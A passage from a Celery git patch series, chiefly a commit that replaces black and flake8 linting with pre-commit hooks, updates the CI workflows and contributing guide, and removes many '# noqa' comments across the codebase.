+ for job in tuple(self._cache.values()):
if not job._accepted:
- job._cancel()
+ if self.synack:
+ job._cancel()
+ else:
+ job.discard()
# clear the outgoing buffer as the tasks will be redelivered by
# the broker anyway.
From f462a437e3371acb867e94b52c2595b6d0a742d8 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 20 Jul 2021 08:11:10 +0100
Subject: [PATCH 015/177] apply pre-commit (#6862)
* configure pre-commit (from twisted)
* remove black
* run pre-commit in ci
* configure isort with pre-commit
* configure pre-commit in tox
* allow E203 for black support in the future
* update contributing guide
* apply pyupgrade
* apply isort
* apply yes-qa
---
.github/workflows/lint_python.yml | 4 +---
.github/workflows/python-package.yml | 4 ++--
.pre-commit-config.yaml | 31 +++++++++++++++++++++-----
CONTRIBUTING.rst | 7 +++---
celery/__init__.py | 14 ++++++------
celery/_state.py | 8 +++----
celery/app/amqp.py | 2 +-
celery/app/base.py | 4 ++--
celery/app/log.py | 2 +-
celery/app/task.py | 4 ++--
celery/app/trace.py | 2 +-
celery/apps/beat.py | 2 +-
celery/backends/arangodb.py | 2 +-
celery/backends/base.py | 4 ++--
celery/backends/cache.py | 4 ++--
celery/backends/cassandra.py | 2 +-
celery/backends/cosmosdbsql.py | 2 +-
celery/backends/couchdb.py | 4 ++--
celery/backends/dynamodb.py | 2 +-
celery/backends/elasticsearch.py | 4 ++--
celery/backends/mongodb.py | 10 ++++-----
celery/backends/redis.py | 4 ++--
celery/beat.py | 2 +-
celery/canvas.py | 4 ++--
celery/concurrency/asynpool.py | 4 ++--
celery/concurrency/eventlet.py | 6 ++---
celery/concurrency/gevent.py | 2 +-
celery/events/state.py | 4 ++--
celery/exceptions.py | 4 ++--
celery/fixups/django.py | 2 +-
celery/platforms.py | 12 +++++-----
celery/result.py | 6 ++---
celery/schedules.py | 2 +-
celery/security/__init__.py | 2 +-
celery/utils/collections.py | 10 ++++-----
celery/utils/debug.py | 2 +-
celery/utils/saferepr.py | 2 +-
celery/utils/serialization.py | 4 ++--
celery/utils/sysinfo.py | 2 +-
celery/utils/threads.py | 10 ++++-----
celery/worker/request.py | 6 ++---
celery/worker/state.py | 4 ++--
celery/worker/worker.py | 2 +-
examples/celery_http_gateway/manage.py | 2 +-
examples/celery_http_gateway/urls.py | 3 +--
examples/django/demoapp/models.py | 2 +-
examples/django/demoapp/tasks.py | 3 ++-
examples/django/proj/wsgi.py | 2 +-
examples/eventlet/webcrawler.py | 6 ++---
setup.cfg | 1 +
t/benchmarks/bench_worker.py | 8 +++----
t/distro/test_CI_reqs.py | 2 +-
t/integration/test_canvas.py | 2 +-
t/unit/backends/test_arangodb.py | 2 +-
t/unit/backends/test_couchbase.py | 2 +-
t/unit/backends/test_couchdb.py | 2 +-
t/unit/backends/test_dynamodb.py | 2 +-
t/unit/concurrency/test_prefork.py | 4 ++--
t/unit/conftest.py | 2 +-
t/unit/contrib/test_sphinx.py | 1 -
t/unit/utils/test_dispatcher.py | 4 ++--
t/unit/utils/test_functional.py | 6 ++---
t/unit/utils/test_platforms.py | 2 +-
t/unit/worker/test_control.py | 2 +-
tox.ini | 8 +++----
65 files changed, 149 insertions(+), 133 deletions(-)
diff --git a/.github/workflows/lint_python.yml b/.github/workflows/lint_python.yml
index 5dd37639e08..8c262d25569 100644
--- a/.github/workflows/lint_python.yml
+++ b/.github/workflows/lint_python.yml
@@ -6,14 +6,12 @@ jobs:
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
+ - uses: pre-commit/action@v2.0.3
- run: pip install --upgrade pip wheel
- run: pip install bandit codespell flake8 isort pytest pyupgrade tox
- run: bandit -r . || true
- run: codespell --ignore-words-list="brane,gool,ist,sherif,wil" --quiet-level=2 --skip="*.key" || true
- - run: flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
- - run: isort . || true
- run: pip install -r requirements.txt || true
- run: tox || true
- run: pytest . || true
- run: pytest --doctest-modules . || true
- - run: shopt -s globstar && pyupgrade --py36-plus **/*.py || true
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 3f74d81eda7..42c56683e4a 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -74,5 +74,5 @@ jobs:
with: { python-version: 3.9 }
- name: Install tox
run: python -m pip install tox
- - name: Lint with flake8
- run: tox --verbose -e flake8
+ - name: Lint with pre-commit
+ run: tox --verbose -e lint
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5939ad63655..057c78f4787 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,10 +1,29 @@
repos:
-- repo: https://github.com/ambv/black
- rev: stable
+ - repo: https://github.com/asottile/pyupgrade
+ rev: v2.21.2
hooks:
- - id: black
- language_version: python3.7
-- repo: https://github.com/pre-commit/pre-commit-hooks
+ - id: pyupgrade
+ args: ["--py36-plus"]
+
+ - repo: https://gitlab.com/pycqa/flake8
+ rev: 3.9.2
+ hooks:
+ - id: flake8
+
+ - repo: https://github.com/asottile/yesqa
rev: v1.2.3
hooks:
- - id: flake8
+ - id: yesqa
+
+ - repo: https://github.com/pre-commit/pre-commit-hooks
+ rev: v4.0.1
+ hooks:
+ - id: check-merge-conflict
+ - id: check-toml
+ - id: check-yaml
+ - id: mixed-line-ending
+
+ - repo: https://github.com/pycqa/isort
+ rev: 5.9.2
+ hooks:
+ - id: isort
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index a774377243a..5e51b3083f5 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -830,14 +830,13 @@ make it easier for the maintainers to accept your proposed changes:
``pytest -xv --cov=celery --cov-report=xml --cov-report term``.
You can check the current test coverage here: https://codecov.io/gh/celery/celery
-- [ ] Run ``flake8`` against the code. The following commands are valid
+- [ ] Run ``pre-commit`` against the code. The following commands are valid
and equivalent.:
.. code-block:: console
- $ flake8 -j 2 celery/ t/
- $ make flakecheck
- $ tox -e flake8
+ $ pre-commit run --all-files
+ $ tox -e lint
- [ ] Build api docs to make sure everything is OK. The following commands are valid
and equivalent.:
diff --git a/celery/__init__.py b/celery/__init__.py
index ae287ea2530..1169a2d55f1 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -13,7 +13,7 @@
from collections import namedtuple
# Lazy loading
-from . import local # noqa
+from . import local
SERIES = 'sun-harmonics'
@@ -65,15 +65,15 @@ def debug_import(name, locals=None, globals=None,
STATICA_HACK = True
globals()['kcah_acitats'[::-1].upper()] = False
if STATICA_HACK: # pragma: no cover
- from celery._state import current_app, current_task # noqa
- from celery.app import shared_task # noqa
- from celery.app.base import Celery # noqa
- from celery.app.task import Task # noqa
- from celery.app.utils import bugreport # noqa
+ from celery._state import current_app, current_task
+ from celery.app import shared_task
+ from celery.app.base import Celery
+ from celery.app.task import Task
+ from celery.app.utils import bugreport
from celery.canvas import (chain, chord, chunks, group, # noqa
maybe_signature, signature, subtask, xmap,
xstarmap)
- from celery.utils import uuid # noqa
+ from celery.utils import uuid
# Eventlet/gevent patching must happen before importing
# anything else, so these tools must be at top-level.
diff --git a/celery/_state.py b/celery/_state.py
index 0e671151685..5d3ed5fc56f 100644
--- a/celery/_state.py
+++ b/celery/_state.py
@@ -109,9 +109,9 @@ def get_current_app():
"""Return the current app."""
raise RuntimeError('USES CURRENT APP')
elif os.environ.get('C_WARN_APP'): # pragma: no cover
- def get_current_app(): # noqa
+ def get_current_app():
import traceback
- print('-- USES CURRENT_APP', file=sys.stderr) # noqa+
+ print('-- USES CURRENT_APP', file=sys.stderr) # +
traceback.print_stack(file=sys.stderr)
return _get_current_app()
else:
@@ -168,12 +168,12 @@ def _app_or_default_trace(app=None): # pragma: no cover
current_process = None
if app is None:
if getattr(_tls, 'current_app', None):
- print('-- RETURNING TO CURRENT APP --') # noqa+
+ print('-- RETURNING TO CURRENT APP --') # +
print_stack()
return _tls.current_app
if not current_process or current_process()._name == 'MainProcess':
raise Exception('DEFAULT APP')
- print('-- RETURNING TO DEFAULT APP --') # noqa+
+ print('-- RETURNING TO DEFAULT APP --') # +
print_stack()
return default_app
return app
diff --git a/celery/app/amqp.py b/celery/app/amqp.py
index a574b2dd792..12a511d75fd 100644
--- a/celery/app/amqp.py
+++ b/celery/app/amqp.py
@@ -558,7 +558,7 @@ def queues(self):
"""Queue name⇒ declaration mapping."""
return self.Queues(self.app.conf.task_queues)
- @queues.setter # noqa
+ @queues.setter
def queues(self, queues):
return self.Queues(queues)
diff --git a/celery/app/base.py b/celery/app/base.py
index 47570763075..f9ac8c18818 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -1239,7 +1239,7 @@ def conf(self):
return self._conf
@conf.setter
- def conf(self, d): # noqa
+ def conf(self, d):
self._conf = d
@cached_property
@@ -1301,4 +1301,4 @@ def timezone(self):
return timezone.get_timezone(conf.timezone)
-App = Celery # noqa: E305 XXX compat
+App = Celery # XXX compat
diff --git a/celery/app/log.py b/celery/app/log.py
index 7e036746cc0..01b45aa4ae1 100644
--- a/celery/app/log.py
+++ b/celery/app/log.py
@@ -245,6 +245,6 @@ def get_default_logger(self, name='celery', **kwargs):
def already_setup(self):
return self._setup
- @already_setup.setter # noqa
+ @already_setup.setter
def already_setup(self, was_setup):
self._setup = was_setup
diff --git a/celery/app/task.py b/celery/app/task.py
index 1e50e613b58..726bb103fe7 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -1073,7 +1073,7 @@ def backend(self):
return backend
@backend.setter
- def backend(self, value): # noqa
+ def backend(self, value):
self._backend = value
@property
@@ -1081,4 +1081,4 @@ def __name__(self):
return self.__class__.__name__
-BaseTask = Task # noqa: E305 XXX compat alias
+BaseTask = Task # XXX compat alias
diff --git a/celery/app/trace.py b/celery/app/trace.py
index a5e3fc3f5a8..ad2bd581dbb 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -316,7 +316,7 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
:keyword request: Request dict.
"""
- # noqa: C901
+
# pylint: disable=too-many-statements
# If the task doesn't define a custom __call__ method
diff --git a/celery/apps/beat.py b/celery/apps/beat.py
index 41437718e9c..8652c62730a 100644
--- a/celery/apps/beat.py
+++ b/celery/apps/beat.py
@@ -111,7 +111,7 @@ def start_scheduler(self):
def banner(self, service):
c = self.colored
- return str( # flake8: noqa
+ return str(
c.blue('__ ', c.magenta('-'),
c.blue(' ... __ '), c.magenta('-'),
c.blue(' _\n'),
diff --git a/celery/backends/arangodb.py b/celery/backends/arangodb.py
index 8297398a6c2..1cd82078070 100644
--- a/celery/backends/arangodb.py
+++ b/celery/backends/arangodb.py
@@ -17,7 +17,7 @@
from pyArango import connection as py_arango_connection
from pyArango.theExceptions import AQLQueryError
except ImportError:
- py_arango_connection = AQLQueryError = None # noqa
+ py_arango_connection = AQLQueryError = None
__all__ = ('ArangoDbBackend',)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index fb1cc408d49..71ca218d56e 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -129,7 +129,7 @@ def __init__(self, app,
# precedence: accept, conf.result_accept_content, conf.accept_content
self.accept = conf.result_accept_content if accept is None else accept
- self.accept = conf.accept_content if self.accept is None else self.accept # noqa: E501
+ self.accept = conf.accept_content if self.accept is None else self.accept
self.accept = prepare_accept_content(self.accept)
self.always_retry = conf.get('result_backend_always_retry', False)
@@ -758,7 +758,7 @@ class BaseBackend(Backend, SyncBackendMixin):
"""Base (synchronous) result backend."""
-BaseDictBackend = BaseBackend # noqa: E305 XXX compat
+BaseDictBackend = BaseBackend # XXX compat
class BaseKeyValueStoreBackend(Backend):
diff --git a/celery/backends/cache.py b/celery/backends/cache.py
index f3d13d95304..7d17837ffd7 100644
--- a/celery/backends/cache.py
+++ b/celery/backends/cache.py
@@ -33,7 +33,7 @@ def import_best_memcache():
is_pylibmc = True
except ImportError:
try:
- import memcache # noqa
+ import memcache
except ImportError:
raise ImproperlyConfigured(REQUIRES_BACKEND)
_imp[0] = (is_pylibmc, memcache, memcache_key_t)
@@ -47,7 +47,7 @@ def get_best_memcache(*args, **kwargs):
Client = _Client = memcache.Client
if not is_pylibmc:
- def Client(*args, **kwargs): # noqa
+ def Client(*args, **kwargs):
kwargs.pop('behaviors', None)
return _Client(*args, **kwargs)
diff --git a/celery/backends/cassandra.py b/celery/backends/cassandra.py
index 1220063b63c..bf4f69c2753 100644
--- a/celery/backends/cassandra.py
+++ b/celery/backends/cassandra.py
@@ -13,7 +13,7 @@
import cassandra.cluster
import cassandra.query
except ImportError: # pragma: no cover
- cassandra = None # noqa
+ cassandra = None
__all__ = ('CassandraBackend',)
diff --git a/celery/backends/cosmosdbsql.py b/celery/backends/cosmosdbsql.py
index 899cbcb866c..344e46ede0c 100644
--- a/celery/backends/cosmosdbsql.py
+++ b/celery/backends/cosmosdbsql.py
@@ -17,7 +17,7 @@
from pydocumentdb.retry_options import RetryOptions
except ImportError: # pragma: no cover
pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \
- HTTPFailure = ConnectionPolicy = RetryOptions = None # noqa
+ HTTPFailure = ConnectionPolicy = RetryOptions = None
__all__ = ("CosmosDBSQLBackend",)
diff --git a/celery/backends/couchdb.py b/celery/backends/couchdb.py
index 43470ed109b..a4b040dab75 100644
--- a/celery/backends/couchdb.py
+++ b/celery/backends/couchdb.py
@@ -9,7 +9,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
__all__ = ('CouchBackend',)
@@ -42,7 +42,7 @@ def __init__(self, url=None, *args, **kwargs):
uscheme = uhost = uport = uname = upass = ucontainer = None
if url:
- _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) # noqa
+ _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url)
ucontainer = ucontainer.strip('/') if ucontainer else None
self.scheme = uscheme or self.scheme
diff --git a/celery/backends/dynamodb.py b/celery/backends/dynamodb.py
index 25a8e3423c1..4fbd9aaf7d7 100644
--- a/celery/backends/dynamodb.py
+++ b/celery/backends/dynamodb.py
@@ -13,7 +13,7 @@
import boto3
from botocore.exceptions import ClientError
except ImportError: # pragma: no cover
- boto3 = ClientError = None # noqa
+ boto3 = ClientError = None
__all__ = ('DynamoDBBackend',)
diff --git a/celery/backends/elasticsearch.py b/celery/backends/elasticsearch.py
index 886acd02475..42e93b23d53 100644
--- a/celery/backends/elasticsearch.py
+++ b/celery/backends/elasticsearch.py
@@ -12,7 +12,7 @@
try:
import elasticsearch
except ImportError: # pragma: no cover
- elasticsearch = None # noqa
+ elasticsearch = None
__all__ = ('ElasticsearchBackend',)
@@ -52,7 +52,7 @@ def __init__(self, url=None, *args, **kwargs):
index = doc_type = scheme = host = port = username = password = None
if url:
- scheme, host, port, username, password, path, _ = _parse_url(url) # noqa
+ scheme, host, port, username, password, path, _ = _parse_url(url)
if scheme == 'elasticsearch':
scheme = None
if path:
diff --git a/celery/backends/mongodb.py b/celery/backends/mongodb.py
index 60448663aa9..b78e4d015b4 100644
--- a/celery/backends/mongodb.py
+++ b/celery/backends/mongodb.py
@@ -13,18 +13,18 @@
try:
import pymongo
except ImportError: # pragma: no cover
- pymongo = None # noqa
+ pymongo = None
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
- from pymongo.binary import Binary # noqa
- from pymongo.errors import InvalidDocument # noqa
+ from pymongo.binary import Binary
+ from pymongo.errors import InvalidDocument
else: # pragma: no cover
- Binary = None # noqa
+ Binary = None
- class InvalidDocument(Exception): # noqa
+ class InvalidDocument(Exception):
pass
__all__ = ('MongoBackend',)
diff --git a/celery/backends/redis.py b/celery/backends/redis.py
index 23d7ac3ccc2..e4a4cc104e7 100644
--- a/celery/backends/redis.py
+++ b/celery/backends/redis.py
@@ -26,8 +26,8 @@
import redis.connection
from kombu.transport.redis import get_redis_error_classes
except ImportError: # pragma: no cover
- redis = None # noqa
- get_redis_error_classes = None # noqa
+ redis = None
+ get_redis_error_classes = None
try:
import redis.sentinel
diff --git a/celery/beat.py b/celery/beat.py
index 74c67f94ed9..7f72f2f2fec 100644
--- a/celery/beat.py
+++ b/celery/beat.py
@@ -703,7 +703,7 @@ def stop(self):
except NotImplementedError: # pragma: no cover
_Process = None
else:
- class _Process(Process): # noqa
+ class _Process(Process):
def __init__(self, app, **kwargs):
super().__init__()
diff --git a/celery/canvas.py b/celery/canvas.py
index 34bcd6a0085..8a471ec0471 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -1579,7 +1579,7 @@ def signature(varies, *args, **kwargs):
return Signature(varies, *args, **kwargs)
-subtask = signature # noqa: E305 XXX compat
+subtask = signature # XXX compat
def maybe_signature(d, app=None, clone=False):
@@ -1609,4 +1609,4 @@ def maybe_signature(d, app=None, clone=False):
return d
-maybe_subtask = maybe_signature # noqa: E305 XXX compat
+maybe_subtask = maybe_signature # XXX compat
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index c6612aff64f..0c16187823b 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -48,13 +48,13 @@
except ImportError: # pragma: no cover
- def __read__(fd, buf, size, read=os.read): # noqa
+ def __read__(fd, buf, size, read=os.read):
chunk = read(fd, size)
n = len(chunk)
if n != 0:
buf.write(chunk)
return n
- readcanbuf = False # noqa
+ readcanbuf = False
def unpack_from(fmt, iobuf, unpack=unpack): # noqa
return unpack(fmt, iobuf.getvalue()) # <-- BytesIO
diff --git a/celery/concurrency/eventlet.py b/celery/concurrency/eventlet.py
index bf794d47f16..c6bb3415f69 100644
--- a/celery/concurrency/eventlet.py
+++ b/celery/concurrency/eventlet.py
@@ -2,11 +2,11 @@
import sys
from time import monotonic
-from kombu.asynchronous import timer as _timer # noqa
+from kombu.asynchronous import timer as _timer
-from celery import signals # noqa
+from celery import signals
-from . import base # noqa
+from . import base
__all__ = ('TaskPool',)
diff --git a/celery/concurrency/gevent.py b/celery/concurrency/gevent.py
index 0bb3e4919ff..33a61bf6198 100644
--- a/celery/concurrency/gevent.py
+++ b/celery/concurrency/gevent.py
@@ -8,7 +8,7 @@
try:
from gevent import Timeout
except ImportError: # pragma: no cover
- Timeout = None # noqa
+ Timeout = None
__all__ = ('TaskPool',)
diff --git a/celery/events/state.py b/celery/events/state.py
index 4fef2bf38cc..f8ff9ad687e 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -99,7 +99,7 @@ def __call__(self, *args, **kwargs):
return self.fun(*args, **kwargs)
-Callable.register(CallableDefaultdict) # noqa: E305
+Callable.register(CallableDefaultdict)
@memoize(maxsize=1000, keyfun=lambda a, _: a[0])
@@ -517,7 +517,7 @@ def worker_event(self, type_, fields):
return self._event(dict(fields, type='-'.join(['worker', type_])))[0]
def _create_dispatcher(self):
- # noqa: C901
+
# pylint: disable=too-many-statements
# This code is highly optimized, but not for reusability.
get_handler = self.handlers.__getitem__
diff --git a/celery/exceptions.py b/celery/exceptions.py
index 775418d113d..64b017aa7c0 100644
--- a/celery/exceptions.py
+++ b/celery/exceptions.py
@@ -183,7 +183,7 @@ def __reduce__(self):
return self.__class__, (self.message, self.exc, self.when)
-RetryTaskError = Retry # noqa: E305 XXX compat
+RetryTaskError = Retry # XXX compat
class Ignore(TaskPredicate):
@@ -271,7 +271,7 @@ class WorkerTerminate(SystemExit):
"""Signals that the worker should terminate immediately."""
-SystemTerminate = WorkerTerminate # noqa: E305 XXX compat
+SystemTerminate = WorkerTerminate # XXX compat
class WorkerShutdown(SystemExit):
diff --git a/celery/fixups/django.py b/celery/fixups/django.py
index 3064601c473..019e695ea2e 100644
--- a/celery/fixups/django.py
+++ b/celery/fixups/django.py
@@ -37,7 +37,7 @@ def fixup(app, env='DJANGO_SETTINGS_MODULE'):
SETTINGS_MODULE = os.environ.get(env)
if SETTINGS_MODULE and 'django' not in app.loader_cls.lower():
try:
- import django # noqa
+ import django
except ImportError:
warnings.warn(FixupWarning(ERR_NOT_INSTALLED))
else:
diff --git a/celery/platforms.py b/celery/platforms.py
index 16cfa8d9a04..82fed9cb9f0 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -236,7 +236,7 @@ def write_pid(self):
rfh.close()
-PIDFile = Pidfile # noqa: E305 XXX compat alias
+PIDFile = Pidfile # XXX compat alias
def create_pidlock(pidfile):
@@ -625,15 +625,15 @@ def arm_alarm(self, seconds):
_signal.setitimer(_signal.ITIMER_REAL, seconds)
else: # pragma: no cover
try:
- from itimer import alarm as _itimer_alarm # noqa
+ from itimer import alarm as _itimer_alarm
except ImportError:
- def arm_alarm(self, seconds): # noqa
+ def arm_alarm(self, seconds):
_signal.alarm(math.ceil(seconds))
else: # pragma: no cover
- def arm_alarm(self, seconds): # noqa
- return _itimer_alarm(seconds) # noqa
+ def arm_alarm(self, seconds):
+ return _itimer_alarm(seconds)
def reset_alarm(self):
return _signal.alarm(0)
@@ -731,7 +731,7 @@ def set_mp_process_title(*a, **k):
"""Disabled feature."""
else:
- def set_mp_process_title(progname, info=None, hostname=None): # noqa
+ def set_mp_process_title(progname, info=None, hostname=None):
"""Set the :command:`ps` name from the current process name.
Only works if :pypi:`setproctitle` is installed.
diff --git a/celery/result.py b/celery/result.py
index d8d7d1685c5..5ed08e3886c 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -2,9 +2,9 @@
import datetime
import time
-from weakref import proxy
from collections import deque
from contextlib import contextmanager
+from weakref import proxy
from kombu.utils.objects import cached_property
from vine import Thenable, barrier, promise
@@ -483,7 +483,7 @@ def task_id(self):
"""Compat. alias to :attr:`id`."""
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, id):
self.id = id
@@ -852,7 +852,7 @@ def app(self):
return self._app
@app.setter
- def app(self, app): # noqa
+ def app(self, app):
self._app = app
@property
diff --git a/celery/schedules.py b/celery/schedules.py
index 3db64e4dab6..3731b747cee 100644
--- a/celery/schedules.py
+++ b/celery/schedules.py
@@ -79,7 +79,7 @@ def maybe_make_aware(self, dt):
def app(self):
return self._app or current_app._get_current_object()
- @app.setter # noqa
+ @app.setter
def app(self, app):
self._app = app
diff --git a/celery/security/__init__.py b/celery/security/__init__.py
index 316ec1db5c1..26237856939 100644
--- a/celery/security/__init__.py
+++ b/celery/security/__init__.py
@@ -5,7 +5,7 @@
from celery.exceptions import ImproperlyConfigured
-from .serialization import register_auth # noqa: need cryptography first
+from .serialization import register_auth # : need cryptography first
CRYPTOGRAPHY_NOT_INSTALLED = """\
You need to install the cryptography library to use the auth serializer.
diff --git a/celery/utils/collections.py b/celery/utils/collections.py
index dc4bd23437a..1fedc775771 100644
--- a/celery/utils/collections.py
+++ b/celery/utils/collections.py
@@ -20,9 +20,9 @@
try:
from django.utils.functional import LazyObject, LazySettings
except ImportError:
- class LazyObject: # noqa
+ class LazyObject:
pass
- LazySettings = LazyObject # noqa
+ LazySettings = LazyObject
__all__ = (
'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap',
@@ -197,7 +197,7 @@ def _iterate_values(self):
values = _iterate_values
-MutableMapping.register(DictAttribute) # noqa: E305
+MutableMapping.register(DictAttribute)
class ChainMap(MutableMapping):
@@ -667,7 +667,7 @@ def _heap_overload(self):
return len(self._heap) * 100 / max(len(self._data), 1) - 100
-MutableSet.register(LimitedSet) # noqa: E305
+MutableSet.register(LimitedSet)
class Evictable:
@@ -768,7 +768,7 @@ def _evictcount(self):
return len(self)
-Sequence.register(Messagebuffer) # noqa: E305
+Sequence.register(Messagebuffer)
class BufferMap(OrderedDict, Evictable):
diff --git a/celery/utils/debug.py b/celery/utils/debug.py
index 0641f1d6c92..3515dc84f9b 100644
--- a/celery/utils/debug.py
+++ b/celery/utils/debug.py
@@ -12,7 +12,7 @@
try:
from psutil import Process
except ImportError:
- Process = None # noqa
+ Process = None
__all__ = (
'blockdetection', 'sample_mem', 'memdump', 'sample',
diff --git a/celery/utils/saferepr.py b/celery/utils/saferepr.py
index ec73e2069a6..d079734fc5d 100644
--- a/celery/utils/saferepr.py
+++ b/celery/utils/saferepr.py
@@ -191,7 +191,7 @@ def _saferepr(o, maxlen=None, maxlevels=3, seen=None):
def _reprseq(val, lit_start, lit_end, builtin_type, chainer):
# type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...]
- if type(val) is builtin_type: # noqa
+ if type(val) is builtin_type:
return lit_start, lit_end, chainer(val)
return (
_literal(f'{type(val).__name__}({lit_start.value}', False, +1),
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index af7804a2132..dc3815e1f7b 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -13,7 +13,7 @@
try:
import cPickle as pickle
except ImportError:
- import pickle # noqa
+ import pickle
__all__ = (
'UnpickleableExceptionWrapper', 'subclass_exception',
@@ -30,7 +30,7 @@
'on': True, 'off': False}
-def subclass_exception(name, parent, module): # noqa
+def subclass_exception(name, parent, module):
"""Create new exception class."""
return type(name, (parent,), {'__module__': module})
diff --git a/celery/utils/sysinfo.py b/celery/utils/sysinfo.py
index 7032d4de885..57425dd8173 100644
--- a/celery/utils/sysinfo.py
+++ b/celery/utils/sysinfo.py
@@ -14,7 +14,7 @@ def _load_average():
else: # pragma: no cover
# Windows doesn't have getloadavg
- def _load_average(): # noqa
+ def _load_average():
return (0.0, 0.0, 0.0)
diff --git a/celery/utils/threads.py b/celery/utils/threads.py
index b080ca42e37..a80b9ed69cf 100644
--- a/celery/utils/threads.py
+++ b/celery/utils/threads.py
@@ -13,15 +13,15 @@
from greenlet import getcurrent as get_ident
except ImportError: # pragma: no cover
try:
- from _thread import get_ident # noqa
+ from _thread import get_ident
except ImportError:
try:
- from thread import get_ident # noqa
+ from thread import get_ident
except ImportError: # pragma: no cover
try:
- from _dummy_thread import get_ident # noqa
+ from _dummy_thread import get_ident
except ImportError:
- from dummy_thread import get_ident # noqa
+ from dummy_thread import get_ident
__all__ = (
@@ -328,4 +328,4 @@ def __len__(self):
# since each thread has its own greenlet we can just use those as
# identifiers for the context. If greenlets aren't available we
# fall back to the current thread ident.
- LocalStack = _LocalStack # noqa
+ LocalStack = _LocalStack
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 7cdb87fe054..c30869bddbf 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -50,7 +50,7 @@ def __optimize__():
_does_info = logger.isEnabledFor(logging.INFO)
-__optimize__() # noqa: E305
+__optimize__()
# Localize
tz_or_local = timezone.tz_or_local
@@ -291,7 +291,7 @@ def task_id(self):
# XXX compat
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, value):
self.id = value
@@ -300,7 +300,7 @@ def task_name(self):
# XXX compat
return self.name
- @task_name.setter # noqa
+ @task_name.setter
def task_name(self, value):
self.name = value
diff --git a/celery/worker/state.py b/celery/worker/state.py
index 5b2ed68c5fe..3afb2e8e3b9 100644
--- a/celery/worker/state.py
+++ b/celery/worker/state.py
@@ -153,7 +153,7 @@ def on_shutdown():
sum(bench_sample) / len(bench_sample)))
memdump()
- def task_reserved(request): # noqa
+ def task_reserved(request):
"""Called when a task is reserved by the worker."""
global bench_start
global bench_first
@@ -165,7 +165,7 @@ def task_reserved(request): # noqa
return __reserved(request)
- def task_ready(request): # noqa
+ def task_ready(request):
"""Called when a task is completed."""
global all_count
global bench_start
diff --git a/celery/worker/worker.py b/celery/worker/worker.py
index 382802a2738..f67d1a336da 100644
--- a/celery/worker/worker.py
+++ b/celery/worker/worker.py
@@ -38,7 +38,7 @@
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
__all__ = ('WorkController',)
diff --git a/examples/celery_http_gateway/manage.py b/examples/celery_http_gateway/manage.py
index 2c41aaabd87..3109e100b4d 100644
--- a/examples/celery_http_gateway/manage.py
+++ b/examples/celery_http_gateway/manage.py
@@ -3,7 +3,7 @@
from django.core.management import execute_manager
try:
- import settings # Assumed to be in the same directory.
+ import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write(
diff --git a/examples/celery_http_gateway/urls.py b/examples/celery_http_gateway/urls.py
index 522b39ff8d1..c916ff8029b 100644
--- a/examples/celery_http_gateway/urls.py
+++ b/examples/celery_http_gateway/urls.py
@@ -1,7 +1,6 @@
+from celery_http_gateway.tasks import hello_world
from django.conf.urls.defaults import (handler404, handler500, # noqa
include, patterns, url)
-
-from celery_http_gateway.tasks import hello_world
from djcelery import views as celery_views
# Uncomment the next two lines to enable the admin:
diff --git a/examples/django/demoapp/models.py b/examples/django/demoapp/models.py
index bec42a2b041..1f7d09ead22 100644
--- a/examples/django/demoapp/models.py
+++ b/examples/django/demoapp/models.py
@@ -1,4 +1,4 @@
-from django.db import models # noqa
+from django.db import models
class Widget(models.Model):
diff --git a/examples/django/demoapp/tasks.py b/examples/django/demoapp/tasks.py
index ac309b8c9fd..c16b76b4c4f 100644
--- a/examples/django/demoapp/tasks.py
+++ b/examples/django/demoapp/tasks.py
@@ -1,8 +1,9 @@
# Create your tasks here
-from celery import shared_task
from demoapp.models import Widget
+from celery import shared_task
+
@shared_task
def add(x, y):
diff --git a/examples/django/proj/wsgi.py b/examples/django/proj/wsgi.py
index 1bb1b542185..d07dbf074cc 100644
--- a/examples/django/proj/wsgi.py
+++ b/examples/django/proj/wsgi.py
@@ -19,7 +19,7 @@
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
-from django.core.wsgi import get_wsgi_application # noqa
+from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')
diff --git a/examples/eventlet/webcrawler.py b/examples/eventlet/webcrawler.py
index 80fb523a742..617e9187567 100644
